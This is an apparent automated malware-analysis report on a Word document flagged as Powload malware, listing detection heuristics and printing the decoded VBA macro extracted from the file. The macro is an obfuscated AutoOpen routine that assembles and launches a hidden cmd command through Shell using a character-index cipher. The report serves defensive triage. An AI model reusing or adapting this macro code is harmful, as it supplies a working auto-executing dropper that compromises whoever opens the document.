MALICIOUS
112
Risk Score
Heuristics 6
-
ClamAV: Doc.Malware.Powload-6752222-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Powload-6752222-0
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen() -
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6071 bytes |
SHA-256: f6abe5d4bb1256eb7f77555ddfa59216a2271ac35983a8397bcb08aaac98baa8 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
49 of 79 identifiers look randomly generated (e.g. 'nkBODMJMldMEH'); 1 string-concatenation chain(s) — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "KdYBNJXA"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
AppActivate iAFYW
AppActivate 8876
AppActivate Sgn(sLYZvd * lqEvmv)
AppActivate CBool(2)
AppActivate VjXUE
AppActivate ChrB(44487 * Wootd)
Shell@ CVar("cm") + uRJRMKMY + hLRzTkimn + OziLPY + mriHqobA + zDkRUaCa + wAFnOSnsGjw + ViwzCivm + kKEJCLhZwaurF, 413851704 - 413851704
AppActivate IttWX
AppActivate Tan(28264 * YQEBd)
End Sub
Attribute VB_Name = "nkBODMJMldMEH"
Function OziLPY()
On Error Resume Next
AppActivate CSng(XpJzG)
AppActivate lElBC
KdZPXiI = "d" + " /V:ON/" + "C" + CStr(Chr(PpwdRldPBrzfW + BCQUkww + 34 + YoWIciwjJUcdS + ZbaWOlaM)) + "set Ja=DI" + "mwqhwwOaMF" + "jvHMdjqz" + "AHhNTLn3k7" + ";$.b/@c" + "W:"
AppActivate sJSlZO
AppActivate CStr(QckCi)
AppActivate CStr(5289)
XiliKnvDES = "sf{Pte" + " x\4=28Jl" + "-pC'E" + "ruQ}yU)(6g" + "+0X,Sio9" + "R&" + "&for" + " %8 in " + "(55,75," + "7,44,59,3"
AppActivate 1051
AppActivate CInt(uQZWVZ)
mmVjkqKIQow = "9,22" + ",44,53,5" + "3,45,31,77" + ",33,58,49," + "26,44" + ",7,54,75,3"
AppActivate Int(8523)
AppActivate 45
SsDnIFzk = "3,17" + ",44,36,43" + ",45,23,44" + ",43,32,3" + "7,44,33,5"
AppActivate 563
AppActivate CByte(jdFMG - JESlW)
AbcEU = "6,53," + "74," + "44,26," + "43" + "," + "30," + "31," + "40,73" + ",7" + "3" + ",49,57,22"
AppActivate iWLSaQ
AppActivate CDbl(IMoQuM)
imdCC = ",43,43,5" + "5,3" + "8,34," + "3" + "4,4" + "0,55,4" + "4,9,36" + ",44,39,32,"
OziLPY = KdZPXiI + XiliKnvDES + mmVjkqKIQow + SsDnIFzk + AbcEU + imdCC
AppActivate CDbl(353005535)
AppActivate OHjwfq
End Function
Function mriHqobA()
On Error Resume Next
AppActivate 41
AppActivate 325
AppActivate 401087306
iADzB = "26" + ",44,43,3" + "4,23," + "68,11,37,6" + "7,2" + "5,35" + ",2" + "2,43,43," + "55,38,3" + "4"
AppActivate hCWsa
AppActivate FpItJ
AppActivate CDate(rjnCPi)
jOhEvRpB = ",34,17," + "46,33,9,75" + ",2" + "2,60,39,9," + "26,3"
AppActivate 283753694
AppActivate CSng(bcWMB + jlFbOF * RXGFmh / KGEAh)
pBPVNOdtZc = "2," + "36,75,2" + ",34,51,77" + ",61,71,7" + "3,35,22," + "43,43,55,3" + "8," + "34" + ",34,7"
AppActivate YJzlh
AppActivate CStr(233568307)
tTsGzkkbvYo = ",7,7,32," + "2,44," + "68,9,27,67" + ",70,32," + "28,74" + ",44," + "26,26,22" + ",9,63,32" + ",13" + ",26,34,7," + "55,54," + "36" + ",75,26,43,"
AppActivate Oct(27)
AppActivate Hex(EsVlm)
AppActivate Fix(NRQwKs)
LYwaYWoUA = "44,2" + "6,4" + "3,34,60,5" + "5,53,75,9," + "16,39," + "34,39," + "50,64" + ",11,52" + ","
AppActivate YViiT
AppActivate CBool(65)
AppActivate 224
jYJhBjwiLc = "35,22,43" + ",43,55,3" + "8,34,34,2," + "74," + "36,59" + ",75," + "26,44,43"
AppActivate IskGT
AppActivate CInt(6)
qENuc = ",54,39,75" + "," + "5" + "3,60,4" + "3,74,75,26" + ",3" + "9,32,36," + "75,2" + ",34,2"
mriHqobA = iADzB + jOhEvRpB + pBPVNOdtZc + tTsGzkkbvYo + LYwaYWoUA + jYJhBjwiLc + qENuc
AppActivate 123212862
AppActivate iYTFZs
End Function
Function zDkRUaCa()
On Error Resume Next
AppActivate frurL
AppActivate 157
AppActivate Tan(YZZhZ + 92113)
dcHBMSN = "5,6" + "4,7" + "6,1" + "5,29,48,18" + ",35,22,4" + "3,4"
AppActivate hJdIK
AppActivate CStr(9)
AppActivate CLng(VBSwm)
bSjzPWiS = "3,55," + "38" + ",3" + "4,3" + "4,33,9" + ",60,43,44," + "32,75,59" + ",68," + "34,71,"
AppActivate Rnd(OBcIQ)
AppActivate Int(klXON)
ohmzHoGz = "57,32,73" + ",55,53,74," + "43,66,57" + ",35,57,6" + "5," + "30,31,17" + ",6" + "0,33,45,4" + "9,45,"
AppActivate wVOZWK
AppActivate Round(JDLoX)
nIvHvprv = "57,67,51,7" + "6,57" + ",30,31,55" + ",15,2" + "8,49,31" + ","
AppActivate CInt(50895 - rslpBz)
AppActivate 140
AppActivate Sqr(KVpKZ - 15777 / UIubj / MTWdJ)
XcRhULf = "44," + "26,13," + "38,43" + ",44,2" + ",55," + "69,5" + "7," + "47,57,6" + "9,31" + ",17,6"
AppActivate 3
AppActivate Fix(jqEFfJ * jusTO)
wvpvVCFdH = "0,33" + ",69,57,3" + "2," + "44" + ",46,44,5" + "7,30,40,7" + "5" + ",59,44," + "9,36," + "22,66,31" + "," + "59,42"
AppActivate 68819893
AppActivate CLng(TBFAh * cMWTd - 7301 + 40439)
AppActivate Cos(iqvFv - 80676 - 94177 * oMPaw)
CfbEIas = ",7,45,74,2" + "6," + "45,31,4" + "0" + ",73,7" + "3,65,41,4" + "3,59,63,41" + ",31,7" + "7,33,"
AppActivate CBool(7)
AppActivate Fix(OZhwj + 57851 * 62223 - EiimB)
AppActivate MmOdTS
TSJJhZTvTQd = "58,32,0,75" + ",7,26," + "53" + "," + "7" + "5,9,1" + "6,1" + "1" + ",74"
AppActivate 9225
AppActivate 5
FLanmR = ",53,44" + ",66" + ",31," + "59,4" + "2,7,72,45" + ",31,55,15," + "2" + "8,65,30" + ",73,43,9" + ",5" + "9,4" + "3,"
AppActivate Sin(vMOjq * OVnHX)
AppActivate CLng(34118 + diIqJp)
AppActivate 460
CZlGQDEA = "54,42,59,7" + "5,36,44,3" + "9,39,45,31" + ",55,15,2" + "8,30,3" + "3,59" + ",44,9,28," + "30," + "62,36,9,43"
AppActivate kJBmz
AppActivate Sqr(8269 / qOjaz)
cWlLU = ",36," + "22,41,62" + ",62,45,45," + "4" + "5,45"
AppActivate 57
AppActivate Sin(zWcTR)
FfrMqO = ",45" + ",45,45,45," + "45" + ",45,45," + "45,4" + "5,45,45," + "45,45," + "79)" + "do " + "set 9EJs"
zDkRUaCa = dcHBMSN + bSjzPWiS + ohmzHoGz + nIvHvprv + XcRhULf + wvpvVCFdH + CfbEIas + TSJJhZTvTQd + FLanmR + CZlGQDEA + cWlLU + FfrMqO
AppActivate OIYdju
AppActivate 7
End Function
Function wAFnOSnsGjw()
On Error Resume Next
AppActivate Round(379866174)
AppActivate Rnd(HDvfFc)
Pcnjkja = "=" + "!9EJs!!" + "Ja:" + "~%8,1!&&" + "if %8==79 "
AppActivate Log(94895 - MpZuq - rjASE - BlCfp)
AppActivate 6294
IOauL = "call %9E" + "Js" + ":~6%" + CStr(Chr(VIKoYtRrFFdP + TvOWBZbjHHuJV + 34 + HwbLbGalvkbL + qfJGnCTX)) + " "
wAFnOSnsGjw = Pcnjkja + IOauL
AppActivate CStr(nKjpGY)
AppActivate ChrB(oAOkN)
AppActivate Rnd(WqvEoU + SzipU + 68713 + LFcsBK)
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.